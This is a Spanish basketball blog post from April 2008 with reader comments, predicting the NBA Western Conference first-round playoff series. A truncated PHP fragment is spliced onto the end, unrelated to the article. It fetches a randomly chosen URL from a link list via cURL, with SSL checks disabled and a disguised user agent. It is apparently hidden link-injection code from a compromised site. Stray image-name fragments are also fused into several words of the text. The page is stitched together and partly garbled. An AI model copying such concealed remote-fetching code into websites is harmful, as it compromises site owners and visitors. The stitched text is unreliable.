Los Playoffs 2008: Western Conference

17 de April de 2008 por TheDeerHunter

westernconf

Tres semanas antes del inicio de los Playoffs en TJNBA cometimos la imprudencia de aventurarnos a predecir la configuración del cuadro. Éste es el momento de revisar los pronósticos y de analizar los cruces en función de los acontecimientos que se han ido sucediendo en la recta final de la temporada regular. Empezamos con el Wild Wild West.

Éste fue el pronóstico TJNBA

Como cabía esperar, la lucha en el Oeste ha sido auténticamente salvaje. Hasta el último momento ha habido batalla en distintos ámbitos, ya sea por la propia plaza de Playoffs, por la ventaja campo o incluso por buscar un cuadro lo menos malo posible. Nadie podía saber cómo iba a terminar todo. La incertidumbre y la emoción ha sido máxima y se adivina una fase final sin precedentes.

A pesar de todo, en la predicción se acertó en todo excepto en la clasificación de Dallas en detrimento de Golden State. Tras la lesión de Nowitzki y la imagen que ofrecían los Mavericks en aquel momento frente al estado de forma de Nuggets y Warriors nadie daba un duro por ese equipo. Milagrosamente el alemán volvió, lo que supuso una inyección de moral extraordinaria para exorcizar de un solo golpe el tufo pesimista que arrastraban desde los Playoffs del año pasado y la discutida adquisición de Jason Kidd. Para algunos, este factor inesperado los devuelve incluso al grupo de candidatos por el título.

El sprint final de los tres contendientes a las dos últimas plazas del Oeste ha sido una verdadera prueba de competitividad. El “We Believe” de Baron Davis y Don Nelson no ha podido soportar la tensión del “obligados a ganar” muy distinto de su condición de equipo revelación que tan buenos koberunbenchresultados les dio. Fue un cruel final de campaña para uno de los equipos más espectaculares e ilusionantes que hemos tenido el placer de disfrutar en estos últimos años.

La cosa queda de esta forma en el Oeste:

1. Lakers vs 8. Denver – El 3-0 a favor de LA y las últimas hazañas de Carmelito no son un buen presagio para Denver. Sí lo es en cambio la solvencia que han mostrado en la pelea por meterse en la pomada. Sin Bynum, Gasol tendrá en Camby un hueso duro de roer y es de prever que la dupla estelar de Nuggets dé quebraderos de cabeza a la defensa que plantee Phil Jackson. La clave de todo está precisamente en ese punto, en lo que puedan mostrar los Lakers en el aspecto defensivo ante jugadores tan impredecibles.

El pronóstico, no obstante, es victoria cómoda para Lakers.dirkiddhead

2. Hornets vs 7. Dallas – 2 a 1 para Hornets. El extraordinario juego de Hornets durante toda la temporada ha dado muestras de flaqueza en el momento decisivo. Byron Scott, previsible entrenador del año, anda con la mosca tras la oreja con la falta de experiencia y mentalidad de su equipo. Enfrente, un grandísimo equipo que reúne todo lo contrario: mucha experiencia en Playoffs y la motivación que supone el último tren para el anillo de alguno de sus miembros. Vienen de menos a más y por calidad no tienen nada que envidiar a nadie.

Puede saltar la sorpresa, me la juego con un 2-4 a favor de Dallas.

tdmanuparkerbench3. Spurs vs 6. Suns – 3 a 1 para Suns. Final anticipada entre los dos máximos favoritos del Oeste a principio de temporada. Van a saltar chispas y puede que también se escape alguna galleta que otra. La rivalidad entre ellos va más allá de lo deportivo. Spurs ha dado ya sobradas muestras de solvencia en Playoffs y disponen de ventaja campo que puede ser decisiva en una eliminatoria a priori tan igualada. De cómo Spurs pueda detener un juego interior muy superior al suyo depende toda la eliminatoria.

Pronóstico: Victoria marginal para los actuales campeones. 4-3 para Spurs (nunca los daría por muertos hasta que no los vea enterrados).

tmacjazz4. Jazz vs 5. Rockets – 2 a 1 para Utah. Los Jazz, con ligeras excepciones, han mostrado una seriedad y fortaleza como equipo fuera de toda duda. En otras circunstancias no cabe duda de que sería difícil predecir un resultado. A pesar de la encomiable actitud y gran rendimiento de los Rockets sin Yao no veo futuro para T-Mac y los suyos.

Victoria fácil de Utah. 4-1

Comenta

7 comentarios a esta entrada

  1. txusma dice:
    #1

    Los Lakers estan muy fuerte y contar con Kobe es toda una garantia pero… Denver puede resultar peligroso. Su juego ofensivo es anarquico pero tienen recursos y su defensa interior es de la mas fuertes del campeonato. Veo a Odom con bastante protagonismo en la eliminatoria.
    Por lo demas estoy de acuerdo, salvo que me da q los Suns se cargan a los Spurs. O’Neal va a hacer una gran serie y junto a Amare van a taladrar una y otra vez la zona de San Antonio. O Ginibili esta muy inspirado o me da q Nash pasa de ronda.

      Citar

  2. MagicJohnson32 dice:
    #2

    Tremendo ese pronosticados 😀

    También creo que los Nuggets son peligrosos pero no sé si Melo estará suficientemente centrado y lo de su defensa interior… pues no sé, no me da ningún miedo. Gasol anota de todas las maneras, jugando de espaldas al aro, de cara, desde media distancia o corriendo el contraataque. Y si Kenyon Martin tiene que ser un factor decisivo…
    Y luego, Kobe. ¿Quién lo defenderá? ¿Iverson? ¿JR? ¿Diawara? Juas juas juas.

    A mí también me da que los Suns se cargan a los Spurs, fíjate. Aunque sinceramente ¡¡me importa un huevo!!

      Citar

  3. txusma dice:
    #3

    Viendo como tenéis los ánimos, el golpe puede ser tremendo… :]

      Citar

  4. Gallis dice:
    #4

    Una a una…

    Lakers-Nuggets: en este oeste todo puede pasar, pero me sorprendería que Denver ganara más de un partido. Tal y como está el equipo angelino ahora, no les veo ninguna posibilidad. Denver no tiene capacidad para defender el tremendo arsenal ofensivo que tenemos y en ataque necesitan que Iverson, Melo y JR jueguen al 110% y creo que ni aún así. en cualquier caso, la concentración defensiva será clave, si hay relajación, puede haber sorpresas. Coincido con Txus en que Odom puede ser clave, porque si está a tope, es imparable para Denver. 4-1

    NO-Dallas: Los Mavs tienen la oportunidad de mandar al garete su leyenda negra. Veremos hasta donde es importante la experiencia en los Playoffs. Si la rodilla de Dirk aguanta, apuesto por una victoria 4-3 de los de Cuban. Ojito con Kidd, que ya vuelve a hacer triples dobles, jeje.

    Spurs-Suns: Leyenda del año par vs efecto Shaq. Pese a lo de anoche, las sensaciones de San Antonio no son buenas. Mientras, el trade de Shaq se hizo para esto. Cuando los Suns le ficharon iban primeros en el oeste, con 3 partidos de ventaja sobre Lakers. Está claro que están hartos de arrasar en regular season y quedarse en el camino. Sin embargo, me da que los Spurs son un hueso demasiado duro de roer. Eso sí, los Suns estarán encantados de poder saldar viejas cuentas. 4-3 para los Spurs.

    Utah- Houston: No se me ocurriría una eliminatoria más marcada por el factor cancha. Pese a la baja de Yao, creo que Houston dará mucha guerra, por lo que me inclino por un 4-3 para los Jazz. Es la (nueva) última oportunidad de T.Mac, jeje…

      Citar

  5. Jabho dice:
    #5

    Yo tb voy uno a uno:

    LAL-Denver: Fácil para LAL. Como mucho Denver ganará un par de partidos pero no creo que ponga en apuros a los amarillo
    NO-Dallas: Ganará Dallas por necesidad…pero no fácil.
    SA-Suns:La verdad es que confio y mucho en los Spurs pero Dallas y Suns estan en el ahora o nunca…Si el trade de Shaq ha de servir para algo debe ser ahora… Bufff eliminatoria muy abierta. Quiero Spurs pero….Bah, que no se diga: Spurs
    Jazz-Rockets: Diria que Jazz pero bajar tanto el nivel fuera de casa puede ser peligroso. Me la juego porlos Rockets.

      Citar

  6. Jabho dice:
    #6

    Ah, Spurs-Suns suena a final de conferencia…. una pena para uno de ellos

      Citar

  7. TheDeerHunter dice:
    #7

    De esa eliminatoria no deberíamos perdernos ni un puñetero partido.

    NO LES DEIS NADA!!! ARREBATÁDSELO TODO!!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>